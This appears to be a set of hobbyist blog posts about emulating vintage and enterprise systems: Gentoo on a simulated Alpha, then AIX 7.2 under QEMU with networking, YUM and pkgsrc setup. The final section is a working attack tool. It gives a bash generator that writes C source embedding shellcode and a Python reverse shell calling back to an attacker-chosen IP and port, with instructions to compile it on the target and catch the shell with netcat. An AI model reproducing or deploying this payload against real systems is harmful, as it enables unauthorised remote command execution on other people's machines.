dev-util/desktop-file-utils-0.23
dev-util/gperf-3.1
dev-util/gtk-doc-am-1.25-r1
dev-util/intltool-0.51.0-r2
dev-util/meson-0.46.1
dev-util/ninja-1.8.2
dev-util/pkgconfig-0.29.2
dev-util/ragel-6.10
dev-util/re2c-1.0.3
games-engines/scummvm-2.0.0
media-fonts/encodings-1.0.4-r1
media-fonts/font-alias-1.0.3-r1
media-fonts/font-misc-misc-1.1.2-r1
media-fonts/font-util-1.3.1
media-fonts/liberation-fonts-2.00.1-r3
media-libs/fontconfig-2.13.0-r4
media-libs/freetype-2.9.1-r3
media-libs/glew-2.1.0
media-libs/glu-9.0.0-r1
media-libs/imlib2-1.5.1
media-libs/libepoxy-1.5.1
media-libs/libjpeg-turbo-1.5.3-r2
media-libs/libpng-1.6.34
media-libs/libsdl2-2.0.8-r2
media-libs/mesa-18.1.9
net-dns/libidn2-2.0.4
net-firewall/iptables-1.4.21-r1
net-libs/gnutls-3.5.19
net-libs/libmnl-1.0.4
net-libs/libnsl-0
net-libs/libpcap-1.8.1
net-mail/mailbase-1.1
net-misc/curl-7.61.1
net-misc/iputils-20171016_pre
net-misc/netifrc-0.5.1
net-misc/openssh-7.5_p1-r4
net-misc/rsync-3.1.3
net-misc/tigervnc-1.8.0-r3
net-misc/wget-1.19.1-r2
perl-core/File-Path-2.130.0
perl-core/File-Temp-0.230.400-r1
sys-apps/acl-2.2.52-r1
sys-apps/attr-2.4.47-r2
sys-apps/baselayout-2.4.1-r2
sys-apps/busybox-1.29.0
sys-apps/coreutils-8.29-r1
sys-apps/debianutils-4.8.3
sys-apps/diffutils-3.6-r1
sys-apps/file-5.33-r4
sys-apps/findutils-4.6.0-r1
sys-apps/gawk-4.1.4
sys-apps/gentoo-functions-0.12
sys-apps/grep-3.0
sys-apps/groff-1.22.2
sys-apps/help2man-1.47.6
sys-apps/hwids-20171003
sys-apps/install-xattr-0.5
sys-apps/iproute2-4.17.0
sys-apps/kbd-2.0.4
sys-apps/kmod-24
sys-apps/less-531
sys-apps/man-db-2.7.6.1-r2
sys-apps/man-pages-4.16
sys-apps/man-pages-posix-2013a
sys-apps/net-tools-1.60_p20161110235919
sys-apps/openrc-0.34.11
sys-apps/opentmpfiles-0.1.3
sys-apps/pciutils-3.5.6
sys-apps/portage-2.3.49
sys-apps/sandbox-2.13
sys-apps/sed-4.5
sys-apps/shadow-4.6
sys-apps/sysvinit-2.88-r9
sys-apps/texinfo-6.3
sys-apps/util-linux-2.32-r4
sys-apps/which-2.21
sys-auth/pambase-20150213-r1
sys-boot/aboot-1.0_pre20040408-r3
sys-devel/autoconf-2.69-r4
sys-devel/autoconf-wrapper-13-r1
sys-devel/automake-1.15.1-r2
sys-devel/automake-wrapper-10
sys-devel/bc-1.06.95-r2
sys-devel/binutils-2.29.1-r1
sys-devel/binutils-2.30-r4
sys-devel/binutils-config-5-r4
sys-devel/bison-3.0.5-r1
sys-devel/flex-2.6.4-r1
sys-devel/gcc-6.4.0-r1
sys-devel/gcc-config-1.8-r1
sys-devel/gettext-0.19.8.1
sys-devel/gnuconfig-20170101
sys-devel/libtool-2.4.6-r3
sys-devel/m4-1.4.17
sys-devel/make-4.2.1-r4
sys-devel/patch-2.7.6-r2
sys-fs/e2fsprogs-1.43.6
sys-fs/eudev-3.2.5
sys-fs/udev-init-scripts-32
sys-kernel/genkernel-3.5.3.3
sys-kernel/gentoo-sources-4.14.65
sys-kernel/linux-firmware-20181001
sys-kernel/linux-headers-4.13
sys-libs/cracklib-2.9.6-r1
sys-libs/db-5.3.28-r2
sys-libs/e2fsprogs-libs-1.43.6
sys-libs/gdbm-1.13-r2
sys-libs/glibc-2.26-r7
sys-libs/libutempter-1.1.6-r2
sys-libs/mtdev-1.1.5
sys-libs/ncurses-6.1-r2
sys-libs/pam-1.3.0-r2
sys-libs/readline-7.0_p3
sys-libs/timezone-data-2018e
sys-libs/zlib-1.2.11-r2
sys-process/procps-3.3.12-r1
sys-process/psmisc-23.1-r1
virtual/acl-0-r1
virtual/dev-manager-0-r1
virtual/editor-0
virtual/glu-9.0-r2
virtual/jpeg-0-r2
virtual/libc-1
virtual/libelf-3
virtual/libffi-3.0.13-r1
virtual/libiconv-0-r2
virtual/libintl-0-r2
virtual/libudev-232
virtual/man-0-r1
virtual/modutils-0
virtual/opengl-7.0-r2
virtual/os-headers-0
virtual/package-manager-1
virtual/pager-0
virtual/pam-0-r1
virtual/perl-CPAN-Meta-2.150.5-r1
virtual/perl-CPAN-Meta-YAML-0.18.0-r3
virtual/perl-Data-Dumper-2.160.0-r1
virtual/perl-Digest-MD5-2.540.0-r3
virtual/perl-Digest-SHA-5.950.100_rc-r6
virtual/perl-ExtUtils-CBuilder-0.280.225-r2
virtual/perl-ExtUtils-Install-2.40.0-r3
virtual/perl-ExtUtils-MakeMaker-7.100.200_rc-r4
virtual/perl-ExtUtils-Manifest-1.700.0-r5
virtual/perl-ExtUtils-ParseXS-3.310.0-r1
virtual/perl-File-Path-2.130.0
virtual/perl-File-Spec-3.630.100_rc-r4
virtual/perl-File-Temp-0.230.400-r5
virtual/perl-Getopt-Long-2.480.0-r1
virtual/perl-IO-1.360.100_rc-r4
virtual/perl-JSON-PP-2.273.0.100_rc-r6
virtual/perl-libnet-3.80.100_rc-r4
virtual/perl-MIME-Base64-3.150.0-r4
virtual/perl-Module-Metadata-1.0.31-r1
virtual/perl-Parse-CPAN-Meta-1.441.700.100_rc-r4
virtual/perl-Perl-OSType-1.9.0-r1
virtual/perl-podlators-4.70.0-r1
virtual/perl-Scalar-List-Utils-1.420.200_rc-r1
virtual/perl-Test-Harness-3.360.100_rc-r3
virtual/perl-Text-ParseWords-3.300.0-r4
virtual/perl-version-0.991.600-r1
virtual/pkgconfig-0-r1
virtual/rubygems-11
virtual/service-manager-0
virtual/shadow-0
virtual/ssh-0
virtual/tmpfiles-0
virtual/ttf-fonts-1-r1
virtual/udev-217
virtual/yacc-0
www-client/dillo-3.0.5
x11-apps/bdftopcf-1.1
x11-apps/iceauth-1.0.8
x11-apps/luit-1.1.1
x11-apps/mesa-progs-8.3.0
x11-apps/mkfontdir-1.0.7
x11-apps/mkfontscale-1.1.3
x11-apps/rgb-1.0.6
x11-apps/xauth-1.0.10
x11-apps/xinit-1.4.0
x11-apps/xkbcomp-1.4.2
x11-apps/xmessage-1.0.5
x11-apps/xrdb-1.1.1
x11-apps/xsetroot-1.1.2
x11-base/xcb-proto-1.13
x11-base/xorg-drivers-1.19
x11-base/xorg-proto-2018.4
x11-base/xorg-server-1.19.5-r2
x11-drivers/xf86-input-keyboard-1.9.0
x11-drivers/xf86-input-libinput-0.27.1
x11-drivers/xf86-input-mouse-1.9.3
x11-drivers/xf86-video-ati-18.0.1-r1
x11-drivers/xf86-video-dummy-0.3.8
x11-drivers/xf86-video-fbdev-0.5.0
x11-drivers/xf86-video-glint-1.2.9
x11-drivers/xf86-video-mga-1.6.5
x11-drivers/xf86-video-nv-2.1.21
x11-drivers/xf86-video-r128-6.10.2
x11-libs/fltk-1.3.3-r3
x11-libs/libdrm-2.4.93
x11-libs/libfontenc-1.1.3-r1
x11-libs/libICE-1.0.9-r2
x11-libs/libpciaccess-0.14
x11-libs/libSM-1.2.2-r2
x11-libs/libX11-1.6.6
x11-libs/libXau-1.0.8-r1
x11-libs/libXaw-1.0.13-r1
x11-libs/libxcb-1.13.1
x11-libs/libXcursor-1.1.15
x11-libs/libXdamage-1.1.4-r2
x11-libs/libXdmcp-1.1.2-r2
x11-libs/libXext-1.3.3-r1
x11-libs/libXfixes-5.0.3-r1
x11-libs/libXfont2-2.0.3-r1
x11-libs/libXft-2.3.2-r1
x11-libs/libXi-1.7.9-r1
x11-libs/libXinerama-1.1.4
x11-libs/libxkbfile-1.0.9-r2
x11-libs/libXmu-1.1.2-r1
x11-libs/libXpm-3.5.12-r1
x11-libs/libXrandr-1.5.1-r1
x11-libs/libXrender-0.9.10-r1
x11-libs/libxshmfence-1.3-r1
x11-libs/libXt-1.1.5-r1
x11-libs/libXtst-1.2.3-r1
x11-libs/libXxf86vm-1.1.4-r1
x11-libs/pixman-0.34.0
x11-libs/xtrans-1.3.5
x11-misc/shared-mime-info-1.9
x11-misc/util-macros-1.19.2
x11-misc/xbitmaps-1.1.2
x11-misc/xkeyboard-config-2.23.1-r1
x11-terms/xterm-327
x11-wm/fluxbox-1.3.7-r3

Unfortunately I had no luck in getting a recent Linux kernel and initramfs on Gentoo to load the disk driver (SCSI) qla1280

# udevadm info -a -n /dev/sda | grep -oP 'DRIVERS?=="\K[^"]+
sd
qla1280

No matter if I build it into the kernel or as separate module, initramfs would not find the root device since there was no /dev/sda usable   so I have ended up using last years kernel and modules as well as initramfs and use the base Alpha Gentoo install CD from April 2018. As I said earlier it took some time to build it all and here it is now. Everything works, networking , X11 desktop over VNC, even some wild acrobatic performances which we will cover here in a small detail.

Act 1 – Running VAX OpenVMS 7.3 via simh on the simulated Alpha

This is as useless as it sounds but it was great fun actually seeing that it worked :) Hey .. So dig this, Simulating Alpha Gentoo system via Alphavm-free on a X86_64 Linux, inside the simulation we run simh vax simulator in which we load an already installed OpenVMS 7.3 disk image and configuration and watch it run via VNC session … it took about 30 minutes to boot (OpenVMS 7.3 inside Gentoo Alpha via the simh vax simulation) but it runs, that’s whats important. Did you understand this at all  ? :) Simulation via simulator via stimulus ..

Act 2. Running Metasploit Framework current on Gentoo Alpha

Yes, its pretty much useless but nevertheless cool once you know that it works.

Loading of Metasploit Framework there takes about 6 minutes but once there its pretty much fun. The only thing I had to do non-gentoo way was to build GIT from sources directly since it had some crazy dependency via emerge that just did not compile (pine-mail-stuff something related .. cannot remember now exactly)

Act 3. Running Dillo in VNC Session and browsing the internet on Alpha Gentoo

Well since we are missing the X11 all-together from the Alphavm-free simulation we might as well cheat a little and emerge the tigervnc server environment on the Gentoo system to actually load some graphical stuff on the simulated Alpha environment :) How else to prove a point then surfing the net with the worlds fastest/most-secure/best browser ? Entering Dillo.

And this concludes todays Flying Circus Alpha Acrobatics show for 2018. Hopefully I won’t repeat this next year in 2019, but who knows .. its always fun messing around systems like this.

Who would not wish to run the best operating system on earth on his pity Intel Laptop ? I will describe here what I have done with the help of others and share some of my findings and recommendations how to get this going.

For this exercise Im using Linux Mint 19 x86_64 and current qemu compiled from source which you can get from here https://github.com/qemu/qemu

One should get the similar output from the compilation

$ git clone git://git.qemu.org/qemu.git
$ cd gemu 
$ mkdir build
$ cd build
$ ../configure
$ make
$ su 
# make install 
# exit 
$  qemu-system-ppc64 --version
QEMU emulator version 3.0.50 (v3.0.0-614-g19b599f766-dirty)
Copyright (c) 2003-2017 Fabrice Bellard and the QEMU Project developers

So once we have qemu installed we can then move on to get an actual AIX ISO, which I cannot obviously share, but I will link some already made documentation how to get it done if you already have a Power environment with AIX on

https://www.ibm.com/developerworks/community/blogs/cgaix/resource/AIX_QEMU_blog.pdf?lang=en_us

Next I will share my tun-tap scripts as well as the installer loader and normal loader scripts for the AIX

Here is my standard Linux networking script that I use for various VMs and simulators (VirtualBox, Alphavm-free, simh, hercules )

#Setup tap and bridge 
tunctl -t tap0 -u user
ifconfig tap0 up
brctl addbr br0
brctl addif br0 enp0s25 vboxnet0 
brctl setfd br0 0
ifconfig enp0s25 10.0.2.1 up 
ifconfig br0 10.0.2.2 netmask 255.255.255.0 broadcast 10.0.2.255 up
brctl addif br0 tap0 vboxnet0 
ifconfig tap0 0.0.0.0
sysctl net.ipv4.ip_forward=1
iptables -A FORWARD --in-interface enp0s25 -j ACCEPT
iptables --table nat -A POSTROUTING --out-interface wlp9s0 -j MASQUERADE

Please change accordingly to your need, enp0s25 is eth0, wlp9s0 is wlan0 that is internet connected.

Here is a slightly modified /etc/qemu-ifup

#! /bin/sh
# Script to bring a network (tap) device for qemu up.
# The idea is to add the tap device to the same bridge
# as we have default routing to.

# in order to be able to find brctl
PATH=$PATH:/sbin:/usr/sbin
ip=$(which ip)

if [ -n "$ip" ]; then
ip link set "$1" up
else
brctl=$(which brctl)
if [ ! "$ip" -o ! "$brctl" ]; then
echo "W: $0: not doing any bridge processing: neither ip nor brctl utility not found" >&2
exit 0
fi
ifconfig "$1" 0.0.0.0 up
fi

switch=$(ip route ls |
awk '/^default / {
for(i=0;i<NF;i++) { if ($i == "dev") { print $(i+1); next; } }
}'
)

switch=br0

# only add the interface to default-route bridge if we
# have such interface (with default route) and if that
# interface is actually a bridge.
# It is possible to have several default routes too
for br in $switch; do
if [ -d /sys/class/net/$br/bridge/. ]; then
if [ -n "$ip" ]; then
ip link set "$1" master "$br"
else
brctl addif $br "$1"
fi
exit # exit with status of the previous command
fi
done

echo "W: $0: no bridge for guest interface found" >&2

Next is my AIX 7.2 TL3SP1 installation loader script

qemu-system-ppc64 -cpu POWER8 -machine pseries -m 2048 -serial stdio -drive file=disk.img,if=none,id=drive-virtio-disk0 -device virtio-scsi-pci,id=scsi -device scsi-hd,drive=drive-virtio-disk0 -cdrom aix.iso -prom-env "boot-command=dev / 0 0 s\" ibm,aix-diagnostics\" property boot cdrom:\ppc\chrp\bootfile.exe -s verbose" -net nic -net tap -display vnc=:1

And here is the simulation loader script

qemu-system-ppc64 -cpu POWER8 -machine pseries -m 2048 -serial stdio -drive file=disk.img,if=none,id=drive-virtio-disk0 -device virtio-scsi-pci,id=scsi -device scsi-hd,drive=drive-virtio-disk0 -cdrom aix.iso -prom-env boot-command='boot disk: ' -net nic -net tap -display vnc=:1

My disk.img is a standard qcow2 compressed image format (100 G)

Once the system is installed ( please use this reference https://www.ibm.com/developerworks/community/blogs/cgaix/resource/AIX_QEMU_blog.pdf?lang=en_us )

Be patient once it all loads (takes approx 5 minutes on my Panasonic CF-53 ToughBook  with Intel(R) Core(TM) i5-3320M CPU @ 2.60GHz

Following are my additional steps that I have done after loggin in the first time after install (the /etc/motd is my own custom one)

AIX 7.2 networking

# ifconfig en0 10.0.2.10 up
# route add 0 10.0.2.2 
# chdev -l inet0 -a hostname=asterix

Add following to 

# echo "nameserver 8.8.8.8" > /etc/resolv.conf 

To make it persistent created a scritp in /etc/network.sh

#!/bin/ksh
echo "nameserver 8.8.8.8" > /etc/resolv.conf
ifconfig en0 10.0.2.10 up
route add 0 10.0.2.2

And made it executable of course

# chmod +x /etc/network.sh

Then added last entry to /etc/inittab so next time we boot, network works

customnet:2:once:/etc/network.sh 2>&1

Test the above, reboot the machine by issuing halt command an re-loading it.

Important thing to notice here – do not use the -serial stdio interface in your terminal for normal work. CTRL-C will kill the qemu simulation and thats something you don’t want. So setup sshd instead (I have allowed remote root user for simplicitys sake here) and connect to your guest AIX via ssh from the Linux host !

Connect to the AIX guest (you can then make as many ssh sessions as needed, once AIX guest is booted its quite fast to use taking into consideration all Power8 instructions are simulated by qemu)

Here are the details about the guest AIX

AIX Version 7
Copyright IBM Corporation, 1982, 2018.
Console login: root
root's Password: 

Welcome to AIX 7.2 running via Qemu-system-ppc64 in X86_64 
-------------------------------------------------------------
Last unsuccessful login: Sat Nov 3 13:04:35 CET 2018 on /dev/vty0 from localhost
Last login: Sun Nov 4 20:12:27 CET 2018 on /dev/pts/1 from 10.0.2.2

[root@asterix ~]# prtconf 
System Model: IBM pSeries (emulated by qemu)
Machine Serial Number: Not Available
Processor Type: PowerPC_POWER8
Processor Implementation Mode: POWER 8
Processor Version: PV_8_Compat
Number Of Processors: 1
Processor Clock Speed: 1000 MHz
CPU Type: 64-bit
Kernel Type: 64-bit
LPAR Info: 0 aix_on_kvm
Memory Size: 2048 MB
Good Memory Size: 2048 MB
Platform Firmware level: Not Available
Firmware Version: SLOF,aik
Console Login: enable
Auto Restart: true
Full Core: false
NX Crypto Acceleration: Not Capable

Network Information
Host Name: asterix
IP Address: 
Sub Netmask: 
Gateway: 10.0.2.2
Name Server: 
Domain Name: 

Paging Space Information
Total Paging Space: 512MB
Percent Used: 1%

Volume Groups Information
============================================================================== 
Active VGs
============================================================================== 
rootvg:
PV_NAME PV STATE TOTAL PPs FREE PPs FREE DISTRIBUTION
hdisk0 active 799 649 159..122..48..160..160
============================================================================== 

INSTALLED RESOURCE LIST

The following resources are installed on the machine.
+/- = Added or deleted from Resource List.
* = Diagnostic support not available.

Model Architecture: chrp
Model Implementation: Uni-Processor, PCI bus

+ sys0 System Object
+ sysplanar0 System Planar
* vio0 Virtual I/O Bus
* vscsi0 Virtual SCSI Client Adapter
* cd0 Virtual SCSI Optical Served by VIO Server
* ent0 Virtual I/O Ethernet Adapter (l-lan)
* vsa0 LPAR Virtual Serial Adapter
* vty0 Asynchronous Terminal
* pci0 PCI Bus
* scsi0 qemu_virtio-scsi-pci:0000:00:02.0 Virtio SCSI Client Adapter (f41a0800)
* hdisk0 qemu_virtio-scsi-pci:0000:00:02.0-LW_0 MPIO Other Virtio SCSI Disk Drive
+ L2cache0 L2 Cache
+ mem0 Memory
+ proc0 Processor

Configure YUM

Please read the documentation here about how to setup the environment
https://public.dhe.ibm.com/aix/freeSoftware/aixtoolbox/ezinstall/ppc/README-yum

Since we have no tools yet installed I will use my Linux Host machine to download all the needed RPMs and then copy them to AIX guest via scp

// On the Linux Host machine 
$ mkdir AIX 
$ cd AIX 
$ wget https://public.dhe.ibm.com/aix/freeSoftware/aixtoolbox/ezinstall/ppc/yum_bundle.tar

// On the AIX guest 
# mkdir /tmp/RPM
# cd /tmp/RPM
# scp user@10.0.2.2:/home/user/AIX/yum_bundle.tar . 
# tar -xv yum_bundle.tar

Install RPMs on the AIX guest

# cd /tmp/RPM
# rpm -ivh ca-certificates-2016.10.7-2.aix6.1.ppc.rpm
# rpm -ivh curl-7.52.1-1.aix6.1.ppc.rpm
# rpm -ivh db-4.8.24-3.aix6.1.ppc.rpm
# rpm -ivh gdbm-1.8.3-5.aix5.2.ppc.rpm
# rpm -ivh gettext-0.19.7-1.aix6.1.ppc.rpm
# rpm -ivh glib2-2.14.6-2.aix5.2.ppc.rpm
# rpm -ivh readline-6.1-2.aix6.1.ppc.rpm
# rpm -ivh sqlite-3.15.2-1.aix6.1.ppc.rpm
# rpm -ivh python-2.7.10-1.aix6.1.ppc.rpm
# rpm -ivh python-devel-2.7.10-1.aix6.1.ppc.rpm
# rpm -ivh python-iniparse-0.4-1.aix6.1.noarch.rpm
# rpm -ivh python-pycurl-7.19.3-1.aix6.1.ppc.rpm
# rpm -ivh python-tools-2.7.10-1.aix6.1.ppc.rpm
# rpm -ivh python-urlgrabber-3.10.1-1.aix6.1.noarch.rpm
# rpm -ivh pysqlite-1.1.7-2.aix6.1.ppc.rpm
# rpm -ivh yum-metadata-parser-1.1.4-2.aix6.1.ppc.rpm
# rpm -ivh yum-3.4.3-5.aix6.1.noarch.rpm

Now YUM is ready to install some tools

# yum install tcsh 
# yum install gcc

If there are problems with RPM db afterwards, simply rebuild it

# rpm --rebuilddb

I do not know how to work in Korn shell (default) too much so I have installed tcsh

# yum install tcsh

And setup the environment to use it  /etc/passwd entry for root

root:!:0:0::/home/root:/usr/bin/tcsh

And then configure tcsh prompt for the root user

# cd /home/root 
# cat .cshrc 
set prompt = '[%n@%m %c]# '

PKGSRC Q3-2018 test

Next I have tested pkgsrc build, please make sure you read the following https://wiki.netbsd.org/pkgsrc/how_to_use_pkgsrc_on_aix/

# ftp ftp.netbsd.org 
230 Guest login ok, access restrictions apply.
ftp> pas
Passive mode on.
ftp> bin
200 Type set to I.
ftp> cd /pub/pkgsrc/pkgsrc-2018Q3
ftp> get pkgsrc.tar.gz

# mv pkgsrc.tar.gz /tmp
# cd /tmp
# gunzip pkgsrc.tar.gz 
# tar -xvf pkgsrc.tar
# setenv CC /opt/freeware/bin/gcc 
# cd pkgsrc/bootsrap
# ./bootstrap

After bootstrap make sure we declare the following variables in TCSH

# setenv CC /opt/freeware/bin/gcc
# setenv USE_NATIVE_GCC yes

Then we can build pkgsrc packages as follows

# /usr/pkg/bin/bmake install clean

P.S

What does not work

•  Bash (bash_64 cpu 95%)
•  Wget – core dump
•  Ruby (cpu 95%)
•  ps (core dump) – using topas instead
•  vmstat – using topas instead

Video presentation is located here

The current msfvenom (metasploit) payloads for AIX are aged and do not work on AIX systems anymore.  Here is an example of what is available right now

# ./msfvenom -l payload | grep aix
aix/ppc/shell_bind_tcp                   Listen for a connection and spawn a command shell
aix/ppc/shell_find_port                  Spawn a shell on an established connection
aix/ppc/shell_interact                   Simply execve /bin/sh (for inetd programs)
aix/ppc/shell_reverse_tcp                Connect back to attacker and spawn a command shell

None of the above payloads are usable on modern AIX 7.2 systems. One can elaborate on the following article from 2012 https://www.offensive-security.com/vulndev/aix-shellcode-metasploit/

But in our exercise we will use something much simpler. Since AIX 7.2 with YUM enabled will ship with Python we can create a nice C code that can be compiled on AIX with GCC 8.1.0 and executed there to give us the desired reverse shell.

Following code generator is written to work on a Linux system and is pretty straight forward. Please note it contains the bogus shellcode inside which of course does not work, and I have left it there simply because I have used a C constructor file from another project and was lazy.

clear 
echo "************************************************************"
echo " Automatic shellcode generator - FOR METASPLOIT             "
echo "   For AIX ppc64   testing on AIX 7.2 TL3SP1                " 
echo " Includes non working ppc reverse shell shellcode soup      "
echo " i    And a working python reverse shell                    "
echo "************************************************************"
echo -e "What IP are we gonna use ? \c"
read IP 
echo -e "What Port Number are we gonna listen to? : \c"
read port
echo '[*] Cleaning up ' 
rm -f aix-payload.c

cat <<EOF > aix-payload.c 
#include <stdio.h>
#include <sys/types.h>
#include <sys/ipc.h>
#include <sys/msg.h>
#include <string.h>
#include <sys/mman.h>
#include <fcntl.h>
#include <sys/socket.h>
#include <stdlib.h>
#include <errno.h>
#include <sys/mman.h>
#include <sys/types.h>
#include <sys/stat.h>
#include <sys/ioctl.h>
#include <unistd.h>
#include <strings.h>
#include <unistd.h>
#include <poll.h>
#include <pthread.h>
#include <stdint.h>

unsigned char buf[] = 
"\x7c\xa5\x2a\x79\x40\x82\xff\xfd\x7f\xc8\x02\xa6\x3b\xde\x01"
"\xff\x3b\xde\xfe\x25\x7f\xc9\x03\xa6\x4e\x80\x04\x20\xff\x02"
"\x01\xbb\xc0\xa8\x0b\x04\x4c\xc6\x33\x42\x44\xff\xff\x02\x3b"
"\xde\xff\xf8\x3b\xa0\x07\xff\x38\x9d\xf8\x02\x38\x7d\xf8\x03"
"\x38\x5d\xf8\xf4\x7f\xc9\x03\xa6\x4e\x80\x04\x21\x7c\x7c\x1b"
"\x78\x38\xbd\xf8\x11\x38\x9e\xff\xf8\x38\x5d\xf8\xf5\x7f\xc9"
"\x03\xa6\x4e\x80\x04\x21\x3b\x7d\xf8\x03\x7f\x63\xdb\x78\x38"
"\x5d\xf9\x17\x7f\xc9\x03\xa6\x4e\x80\x04\x21\x7f\x65\xdb\x78"
"\x7c\x84\x22\x78\x7f\x83\xe3\x78\x38\x5d\xfa\x93\x7f\xc9\x03"
"\xa6\x4e\x80\x04\x21\x37\x7b\xff\xff\x40\x80\xff\xd4\x7c\xa5"
"\x2a\x79\x40\x82\xff\xfd\x7f\x08\x02\xa6\x3b\x18\x01\xff\x38"
"\x78\xfe\x29\x98\xb8\xfe\x31\x94\xa1\xff\xfc\x94\x61\xff\xfc"
"\x7c\x24\x0b\x78\x38\x5d\xf8\x08\x7f\xc9\x03\xa6\x4e\x80\x04"
"\x21\x2f\x62\x69\x6e\x2f\x63\x73\x68";

void genlol();
int random_in_range (unsigned int min, unsigned int max);
int random_in_range (unsigned int min, unsigned int max)
{
int base_random = rand();
if (RAND_MAX == base_random){
return random_in_range(min, max);
}
int range = max - min,
remainder = RAND_MAX % range,
bucket = RAND_MAX / range;
if (base_random < RAND_MAX - remainder) {
return min + base_random/bucket;
} else {
return random_in_range (min, max);
}
}
char* rev(char* str)
{
int end=strlen(str)-1;
int i;
for(i=5; i<end; i++)
{
str[i] ^= 1;
}
return str;
}
int main(int argc, char **argv)
{
system ("/usr/bin/clear");
printf ("==================\n");
printf ("AIX reverse shell \n");
printf ("==================\n");
system("/usr/bin/sleep 1");
printf ("Getting psyched ..\n");
printf(".");
fflush(stdout);
system("/usr/bin/sleep 1");
printf("..");
fflush(stdout);
system("/usr/bin/sleep 1");
printf("...");
fflush(stdout);
system("/usr/bin/sleep 1");
printf("....");
printf ("\n[*] Spawning shell\n");
pid_t process_id = 0;
pid_t sid = 0;
process_id = fork();
if (process_id < 0)
{
printf("hold on!\n");
exit(1);
}
if (process_id > 0)
{
printf("[+] Check the remote host now \n", process_id);
exit(0);
}
void *ptr = mmap(0, 0x2000, PROT_WRITE|PROT_READ|PROT_EXEC, MAP_ANON | MAP_PRIVATE, -1, 0);
memcpy(ptr,buf,sizeof buf);
void (*fp)() = (void (*)())ptr;
system("/usr/bin/python -c \'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"CHANGEIP\",CHANGEPORT));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/usr/bin/sh\",\"-i\"]);\'");
fp();
printf ("\n[*]  ping..pong\n");
}
void genlol(){
int num1, num2, num3;
num1=100;
while (num1<=5) {
num1=random_in_range(0,10000);
num2=random_in_range(0,10000);
num3=random_in_range(0,10000);
printf ("\n[*] ..... \n");
}
}
EOF
sed -i "s/CHANGEIP/$IP/g" aix-payload.c
sed -i "s/CHANGEPORT/$port/g" aix-payload.c

if [ -f ./aix-payload.c ]; then
echo '[*] aix-payoad.c generated ...'
ls -la aix-payload.c
echo '[*] Now upload the aix-payload.c to AIX machine and compile with gcc aix-payload.c -o aix-payload' 
echo '[*] And on the attacker machine start netcat listener on TCP port we have chosen above'
else
echo '[-] Something went wrong .. '
exit 0
fi

Once we run the above script we need to transfer the source code it generates (aix-payload.c) to the AIX 7.2 system and compile it there

On our attacker machine you need to have Netcat installed we just call it and listen for incoming TCP connection on the port we have defined in the generator case

Next we execute the compiled aix-payload binary on the target AIX 7.2 machine

And check the reverse shell pop-up on our netcat listener

And that is it. Simple exercise (and please excuse my C code )